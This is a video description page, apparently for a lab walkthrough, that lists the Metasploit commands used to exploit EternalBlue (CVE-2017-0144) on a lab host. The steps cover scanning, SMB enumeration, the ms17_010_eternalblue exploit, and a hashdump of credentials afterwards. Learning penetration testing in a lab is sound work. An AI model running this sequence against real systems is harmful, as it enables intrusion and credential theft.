Project 128 - Exploiting CVE-2017-0144: EternalBlue
Автор: Daryl Shows His Work
Загружено: 2026-01-07
Просмотров: 6
Commands Used (in the order that they appear in the video):
1. service postgresql start && msfconsole
2. setg RHOSTS 10.3.25.189
3. workspace -a EternalBlue
4. db_nmap -sS -sV -O 10.3.25.189 (to run syn, version, and operating scan in Metasploit and saves results in its DB)
5. hosts
6. services
7. search smb_version (to find a auxiliary module that enumerates the version of SMB running on target host)
8. use auxiliary/scanner/smb/smb_version
9. set RPORT 445
10. run
11. Opened a new terminal and searchsploit "Microsoft Windows SMB" | grep -e "Metasploit" - from terminal home screen
12. Back in Metasploit terminal, search eternal
13. use auxiliary/scanner/smb/smb_ms17_010 (to scan target host for vulnerability)
14. use exploit/windows/smb/ms17_010_eternalblue (to choose exploitation module)
15. show options
16. exploit
17. sysinfo
18. getuid
19. hashdump
Доступные форматы для скачивания:
Скачать видео mp4
-
Информация по загрузке: